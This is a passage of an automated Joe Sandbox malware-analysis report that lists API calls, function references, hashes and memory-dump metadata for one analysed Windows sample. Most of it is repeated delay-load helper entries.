                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: ab9446da2939af118138d13d4ec6db54853d105e9e3f1c57efa7ca4264279a30
                        • Instruction ID: 36991f2a8bb53708798a4463d84213e6bf3016bbc312671a7c5dce64aae15fbb
                        • Opcode Fuzzy Hash: ab9446da2939af118138d13d4ec6db54853d105e9e3f1c57efa7ca4264279a30
                        • Instruction Fuzzy Hash: 1AF0E232649221A7EF215B22AC05FAB3B48EF43B70B2B8016F808E7190CF70DD0586F0
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 16f7bc5b2ea7cbe3f8244a75966b0c939f82c38357ea7792b0d30de68114d1d8
                        • Instruction ID: ebd90cc24e4dbd98ed9b1226a69305f8589c2bf7fbcb1de2c1362741d5fc40a2
                        • Opcode Fuzzy Hash: 16f7bc5b2ea7cbe3f8244a75966b0c939f82c38357ea7792b0d30de68114d1d8
                        • Instruction Fuzzy Hash: 05E06D363452215ADF313B65DC01F6F3E8CDF527A1F1A0121EC56E6191EB61DC4082F1
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00173301,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 0017335B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 97551f1bcedcbcffd8ac3e39966500f94be55f1a06eabe5453f1648d14429358
                        • Instruction ID: 715ebd4e64d850f740d9ae430c51b7dca4766e24b4aacbe35d2dd6bf94f509b4
                        • Opcode Fuzzy Hash: 97551f1bcedcbcffd8ac3e39966500f94be55f1a06eabe5453f1648d14429358
                        • Instruction Fuzzy Hash: 0FF0A770445B41CFE7344B28D54479277F47B15361F048B1EE0FA428E0CB70AA89E650
                        APIs
                          • Part of subcall function 00174D8A: __EH_prolog3_GS.LIBCMT ref: 00174D94
                          • Part of subcall function 00174D8A: FindFirstFileW.KERNELBASE(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174DBD
                          • Part of subcall function 00174D8A: FindFirstFileW.KERNELBASE(-00000028,-00000278,?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E08
                          • Part of subcall function 00174D8A: GetLastError.KERNEL32(?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E66
                        • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                        • String ID:
                        • API String ID: 765066492-0
                        • Opcode ID: ebd01101126e875a1f450b0dd0ea885ec66b013cf38689aa6f021f159df9780c
                        • Instruction ID: 00ca0ae4563b2fab597622bb991cd104b7290092a6f1b0acf270cffcc50a37bb
                        • Opcode Fuzzy Hash: ebd01101126e875a1f450b0dd0ea885ec66b013cf38689aa6f021f159df9780c
                        • Instruction Fuzzy Hash: E3F0A731009750ABCF221BB89904A5B7FF46F26330F04CB09F0ED026A2C730D455DB26
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00183F1D
                          • Part of subcall function 00173650: CreateFileW.KERNELBASE(00000000,?,?,00000000,00000003,08000000,00000000,B19080A7,?,00000000,?,?,?,00000000,0019FCB8,000000FF), ref: 00173718
                          • Part of subcall function 00173650: GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017372A
                          • Part of subcall function 00173650: CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,?,?,00000000,0019FCB8,000000FF), ref: 00173776
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CreateFile$ErrorH_prolog3_Last
                        • String ID:
                        • API String ID: 4294874049-0
                        • Opcode ID: 7e0666524157edcbc0f816e38af12c2b68f358f867ca5bb0909d3b8ac42261e9
                        • Instruction ID: 32853f9f6a06d7f67269f90cb122c3463e9e78788520725c6bc4874a10ab73e6
                        • Opcode Fuzzy Hash: 7e0666524157edcbc0f816e38af12c2b68f358f867ca5bb0909d3b8ac42261e9
                        • Instruction Fuzzy Hash: 1EE0AC3591421CAADF00FB94CC95AED7335AF65704F144415BA196B192DB30AF08DBA1
                        APIs
                        • GdipAlloc.GDIPLUS(00000010), ref: 00185BDC
                          • Part of subcall function 00185919: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0018593A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Gdip$AllocBitmapCreateFromStream
                        • String ID:
                        • API String ID: 1915507550-0
                        • Opcode ID: 478f8b8c81deb0fc53abe9f08a4f22149e6ab8492a042acd5b5e01f701b0f814
                        • Instruction ID: f2b294c9ce3389dfa1306aa7e7cf51b6333457b524da307c5ea5161e718204f8
                        • Opcode Fuzzy Hash: 478f8b8c81deb0fc53abe9f08a4f22149e6ab8492a042acd5b5e01f701b0f814
                        • Instruction Fuzzy Hash: 3ED0C930650A09BADF457B659C1296E7A9BEB20354F008125BC4695191EFB2DF10AFA1
                        APIs
                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,0017B82D), ref: 0018B030
                          • Part of subcall function 001875D8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
                          • Part of subcall function 001875D8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
                          • Part of subcall function 001875D8: IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
                          • Part of subcall function 001875D8: TranslateMessage.USER32(?), ref: 0018761C
                          • Part of subcall function 001875D8: DispatchMessageW.USER32(?), ref: 00187626
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                        • String ID:
                        • API String ID: 897784432-0
                        • Opcode ID: 18961071d808d391479318b65fb30f623fd7762ad83a32f6783324d1c96190e8
                        • Instruction ID: e24caf8f5fdffbb2e6bd28214fb6fb6919bb715591f1e750e20c4dcbf705440d
                        • Opcode Fuzzy Hash: 18961071d808d391479318b65fb30f623fd7762ad83a32f6783324d1c96190e8
                        • Instruction Fuzzy Hash: 55D09E71154240AAE6022B51DD46F0E7EB6BB98B04F404554B248744F1C662DD619F06
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 48c4f49f7425030eb5a2db00d126591cdac80a5151a0c0884d90d2d55a7e8eda
                        • Instruction ID: 85118b0a4a22c27c6bc6f1f326d593855d613b453db4045a2f5be96ece2480a7
                        • Opcode Fuzzy Hash: 48c4f49f7425030eb5a2db00d126591cdac80a5151a0c0884d90d2d55a7e8eda
                        • Instruction Fuzzy Hash: 72B0128525C101BD710871851D47D36114CC2E4F10338891EF015D4181D7404D4506F5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 2d5b76acc7f124b284664012ff90d3ef35246cabd5471274d07bcdd31b0b9389
                        • Instruction ID: e44268804e4c8dd3a8692d47eb43a37a63b56b81e30e2e3557f2762c1074fd4b
                        • Opcode Fuzzy Hash: 2d5b76acc7f124b284664012ff90d3ef35246cabd5471274d07bcdd31b0b9389
                        • Instruction Fuzzy Hash: 77B0128525C105BD710831411E97C36110CC2E5F14338C61FF420E408197404D4405F6
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 4ffa274335196223ec8ec25438cfd66f24812d6cb26d3f03ad8821a642e97d2e
                        • Instruction ID: 6d096ffb99e29f400263c66f5a2f49fdf069e3ed61d6f181e1384848f018f023
                        • Opcode Fuzzy Hash: 4ffa274335196223ec8ec25438cfd66f24812d6cb26d3f03ad8821a642e97d2e
                        • Instruction Fuzzy Hash: 0CB0129525C101BD7108B14A1E47D36114CC2D4F10334451EF014D4481D7404F4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 230519ec39c62656a5e927f6cb343f6485b991fd8772282b16ea0f749ed304c1
                        • Instruction ID: d89a00353225b4e659f88364a6192a93e76550a0e6176a19334bd8be7dc77c0c
                        • Opcode Fuzzy Hash: 230519ec39c62656a5e927f6cb343f6485b991fd8772282b16ea0f749ed304c1
                        • Instruction Fuzzy Hash: 33B0129525C201BD7148B1491D47D36114CC2D4F10334461EF014D4081D7404E8006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: b66d4cb5e3538677f536ca0c95b210b7c05e0a7250c6ee4b5219e1943ec0e80f
                        • Instruction ID: 2991df464fde4f627fb007755caba15dd74462a11e2bfb6fadfd4635cf725f1a
                        • Opcode Fuzzy Hash: b66d4cb5e3538677f536ca0c95b210b7c05e0a7250c6ee4b5219e1943ec0e80f
                        • Instruction Fuzzy Hash: C1B0129625C101BD7108B1491D57D36114CC2D5F10334851EF414D4081D7404E4006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 3a9cc122186f5df8a551c8577d1f372624fc28746be63abc587b683ae4e20779
                        • Instruction ID: b6a7113d6dc8ff859c1fb54662b3d60751d53171626f17b787864f37b0ab620d
                        • Opcode Fuzzy Hash: 3a9cc122186f5df8a551c8577d1f372624fc28746be63abc587b683ae4e20779
                        • Instruction Fuzzy Hash: 92B0129525D201BD714872451D47D36114CC2D4F14338461FF014D4081D7408D8006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: b4837aed1684607df2719f0a6c1fed919eab08fd5606de1a9e1e79b8e686de46
                        • Instruction ID: 202c4b0c5f7deea25f0eb2168b6164dd8f8020c588f2fd8c374478acc4da182f
                        • Opcode Fuzzy Hash: b4837aed1684607df2719f0a6c1fed919eab08fd5606de1a9e1e79b8e686de46
                        • Instruction Fuzzy Hash: C8B0128529D101BD710871451D57D36114CC2D5F14338861EF414D4081D7404D4006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 8a24726f2522152fc95865fd18308a80bce8ea94f0a2ce1c50d78742d683148f
                        • Instruction ID: 98db0f98d0a418e3aabe059bd42bb08388a0905e57baab296a0eb6adebbd8109
                        • Opcode Fuzzy Hash: 8a24726f2522152fc95865fd18308a80bce8ea94f0a2ce1c50d78742d683148f
                        • Instruction Fuzzy Hash: 88B0129525C101BD7108B14A1D47D36114CC2D4F10334451EF014D4081D7404E4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: ec01218f1a9e647d119b49164d11bad828dd8b52281d519b17036e91106b90c7
                        • Instruction ID: bfb9da1cc7d79e736553a5e1584466aded727f2d3b58dafabe7ba1cf0ee6d428
                        • Opcode Fuzzy Hash: ec01218f1a9e647d119b49164d11bad828dd8b52281d519b17036e91106b90c7
                        • Instruction Fuzzy Hash: 63B012C925C101BD710871551D57D36118CC2D5F10334851EF514D4081D7404D4006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: af6c0d1b3397792d0de608343c3ac8119cf1d8bc6ec9a5eb6a765f887b694779
                        • Instruction ID: d260887935dd43da0cbe6e8b701f687be26359358fe0592f01f3f0260535bf1d
                        • Opcode Fuzzy Hash: af6c0d1b3397792d0de608343c3ac8119cf1d8bc6ec9a5eb6a765f887b694779
                        • Instruction Fuzzy Hash: DEB0128525E101BD710871461E47D36154CC2D4F14338451EF014D4481D7404E4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
